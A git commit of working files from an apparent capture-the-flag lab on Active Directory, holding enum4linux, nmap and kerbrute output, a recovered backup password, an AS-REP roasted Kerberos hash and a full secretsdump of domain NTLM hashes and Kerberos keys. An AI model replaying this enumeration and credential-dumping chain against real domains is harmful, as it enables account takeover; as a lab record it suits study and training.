initial commit

CTF/AttacktiveDirectory/backup_creds.txt

@@ -0,0 +1 @@
+backup@spookysec.local:backup2517860

CTF/AttacktiveDirectory/enum4linux_scan1.txt

@@ -0,0 +1,158 @@
+Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct 15 16:46:08 2025
+
+ =========================================( Target Information )=========================================
+
+Target ........... 10.10.241.222
+RID Range ........ 500-550,1000-1050
+Username ......... ''
+Password ......... ''
+Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
+
+
+ ===========================( Enumerating Workgroup/Domain on 10.10.241.222 )===========================
+
+
+[E] Can't find workgroup/domain
+
+
+
+ ===============================( Nbtstat Information for 10.10.241.222 )===============================
+
+Looking up status of 10.10.241.222
+No reply from 10.10.241.222
+
+ ===================================( Session Check on 10.10.241.222 )===================================
+
+
+[+] Server 10.10.241.222 allows sessions using username '', password ''
+
+
+ ================================( Getting domain SID for 10.10.241.222 )================================
+
+Domain Name: THM-AD
+Domain Sid: S-1-5-21-3591857110-2884097990-301047963
+
+[+] Host is part of a domain (not a workgroup)
+
+
+ ==================================( OS information on 10.10.241.222 )==================================
+
+
+[E] Can't get OS info with smbclient
+
+
+[+] Got OS info for 10.10.241.222 from srvinfo: 
+do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
+
+
+ =======================================( Users on 10.10.241.222 )=======================================
+
+
+[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
+
+
+
+[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
+
+
+ =================================( Share Enumeration on 10.10.241.222 )=================================
+
+do_connect: Connection to 10.10.241.222 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
+
+	Sharename       Type      Comment
+	---------       ----      -------
+Reconnecting with SMB1 for workgroup listing.
+Unable to connect with SMB1 -- no workgroup available
+
+[+] Attempting to map shares on 10.10.241.222
+
+
+ ===========================( Password Policy Information for 10.10.241.222 )===========================
+
+
+[E] Unexpected error from polenum:
+
+
+
+[+] Attaching to 10.10.241.222 using a NULL share
+
+[+] Trying protocol 139/SMB...
+
+	[!] Protocol failed: Cannot request session (Called Name:10.10.241.222)
+
+[+] Trying protocol 445/SMB...
+
+	[!] Protocol failed: SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
+
+
+
+[E] Failed to get password policy with rpcclient
+
+
+
+ ======================================( Groups on 10.10.241.222 )======================================
+
+
+[+] Getting builtin groups:
+
+
+[+]  Getting builtin group memberships:
+
+
+[+]  Getting local groups:
+
+
+[+]  Getting local group memberships:
+
+
+[+]  Getting domain groups:
+
+
+[+]  Getting domain group memberships:
+
+
+ ==================( Users on 10.10.241.222 via RID cycling (RIDS: 500-550,1000-1050) )==================
+
+
+[I] Found new SID: 
+S-1-5-21-3591857110-2884097990-301047963
+
+[I] Found new SID: 
+S-1-5-21-3591857110-2884097990-301047963
+
+[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
+
+S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
+S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
+S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
+S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
+S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
+
+[+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''
+
+S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
+S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
+S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
+S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
+S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
+S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
+
+ ===============================( Getting printer info for 10.10.241.222 )===============================
+
+do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
+
+
+enum4linux complete on Wed Oct 15 16:56:19 2025
+

CTF/AttacktiveDirectory/kerbrute_userenum.txt

@@ -0,0 +1,19 @@
+2025/10/15 17:08:13 >  Using KDC(s):
+2025/10/15 17:08:13 >  	10.10.241.222:88
+2025/10/15 17:08:14 >  [+] VALID USERNAME:	 james@spookysec.local
+2025/10/15 17:08:16 >  [+] VALID USERNAME:	 svc-admin@spookysec.local
+2025/10/15 17:08:19 >  [+] VALID USERNAME:	 James@spookysec.local
+2025/10/15 17:08:19 >  [+] VALID USERNAME:	 robin@spookysec.local
+2025/10/15 17:08:30 >  [+] VALID USERNAME:	 darkstar@spookysec.local
+2025/10/15 17:08:38 >  [+] VALID USERNAME:	 administrator@spookysec.local
+2025/10/15 17:08:58 >  [+] VALID USERNAME:	 backup@spookysec.local
+2025/10/15 17:09:10 >  [+] VALID USERNAME:	 paradox@spookysec.local
+2025/10/15 17:10:06 >  [+] VALID USERNAME:	 JAMES@spookysec.local
+2025/10/15 17:10:20 >  [+] VALID USERNAME:	 Robin@spookysec.local
+2025/10/15 17:11:32 >  [+] VALID USERNAME:	 Administrator@spookysec.local
+2025/10/15 17:13:37 >  [+] VALID USERNAME:	 Darkstar@spookysec.local
+2025/10/15 17:14:13 >  [+] VALID USERNAME:	 Paradox@spookysec.local
+2025/10/15 17:16:28 >  [+] VALID USERNAME:	 DARKSTAR@spookysec.local
+2025/10/15 17:17:03 >  [+] VALID USERNAME:	 ori@spookysec.local
+2025/10/15 17:18:07 >  [+] VALID USERNAME:	 ROBIN@spookysec.local
+2025/10/15 18:13:51 >  Done! Tested 73317 usernames (16 valid) in 908.038 seconds

CTF/AttacktiveDirectory/nmap_scan1.gnmap

@@ -0,0 +1,4 @@
+# Nmap 7.95 scan initiated Wed Oct 15 16:46:53 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oG nmap_scan1.gnmap 10.10.241.222
+Host: 10.10.241.222 ()	Status: Up
+Host: 10.10.241.222 ()	Ports: 53/open/tcp//domain//Simple DNS Plus/, 80/open/tcp//http//Microsoft IIS httpd 10.0/, 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos (server time: 2025-10-15 14:47:05Z)/, 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 389/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)/, 445/open/tcp//microsoft-ds?///, 464/open/tcp//kpasswd5?///, 593/open/tcp//ncacn_http//Microsoft Windows RPC over HTTP 1.0/, 636/open/tcp//tcpwrapped///, 3268/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)/, 3269/open/tcp//tcpwrapped///, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/	Ignored State: closed (986)	Seq Index: 261	IP ID Seq: Incremental
+# Nmap done at Wed Oct 15 16:47:32 2025 -- 1 IP address (1 host up) scanned in 39.39 seconds

CTF/AttacktiveDirectory/smbshare_backup/backup_credentials.txt

@@ -0,0 +1 @@
+YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

CTF/AttacktiveDirectory/svc-admin_hash.txt

@@ -0,0 +1 @@
+$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:e8176354e982957381e03bc53754d362$3f246cdacd0203fab05c9aba71a5bd3a43fe80536702824aa6738baecd380039a70427d3e87aaed95f7a2a3b5f0c4138632fbc3fb5e379a1e6f635383588102c626d5decaaa11718c7798b4b0af686bab3a98af958794e0512ebe92f33603a6e13a4c08f7efa6c4805792f77923bf020247a0b98583126f8b95ce7aa70f69a13382ba5bde4ccc494ef29533ce98a703155cf163710fa1949611b4e8678ad22a84092791290169b2596fa5d828dedd28f402e223eefa0c8151fd9d28ae5d3d19b5afeee716f4ec5c132f7659636576feb35c80108dbbf084bf8acfb8a854ef100b01259a0a2f43b88f08c4cad17e75463c413

CTF/AttacktiveDirectory/test_usernames.txt

@@ -0,0 +1,16 @@
+james@spookysec.local
+svc-admin@spookysec.local
+James@spookysec.local
+robin@spookysec.local
+darkstar@spookysec.local
+administrator@spookysec.local
+backup@spookysec.local
+paradox@spookysec.local
+JAMES@spookysec.local
+Robin@spookysec.local
+Administrator@spookysec.local
+Darkstar@spookysec.local
+Paradox@spookysec.local
+DARKSTAR@spookysec.local
+ori@spookysec.local
+ROBIN@spookysec.local

CTF/AttacktiveDirectory/user_hashes.txt

@@ -0,0 +1,76 @@
+Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
+
+[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
+[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+[*] Using the DRSUAPI method to get NTDS.DIT secrets
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
+spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
+spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
+spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
+spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
+spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
+spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
+spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
+spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
+spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
+spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
+spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
+spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
+spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
+spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
+ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:ca09477729bf474d2cb1dfdd00306825:::
+[*] Kerberos keys grabbed
+Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
+Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
+Administrator:des-cbc-md5:2079ce0e5df189ad
+krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
+krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
+krbtgt:des-cbc-md5:b94f97e97fabbf5d
+spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
+spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
+spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
+spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
+spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
+spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
+spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
+spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
+spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
+spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
+spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
+spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
+spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
+spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
+spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
+spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
+spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
+spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
+spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
+spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
+spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
+spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
+spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
+spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
+spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
+spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
+spookysec.local\paradox:des-cbc-md5:83988983f8b34019
+spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
+spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
+spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
+spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
+spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
+spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
+spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
+spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
+spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
+spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
+spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
+spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
+spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
+spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
+spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
+ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:701e5759c859973211bb4ba1567c031431e43c8e4ef49677c305bccab225c1de
+ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:045d7818869ce52a555b7dac67c3a0a4
+ATTACKTIVEDIREC$:des-cbc-md5:3de0347cb33e835b
+[*] Cleaning up...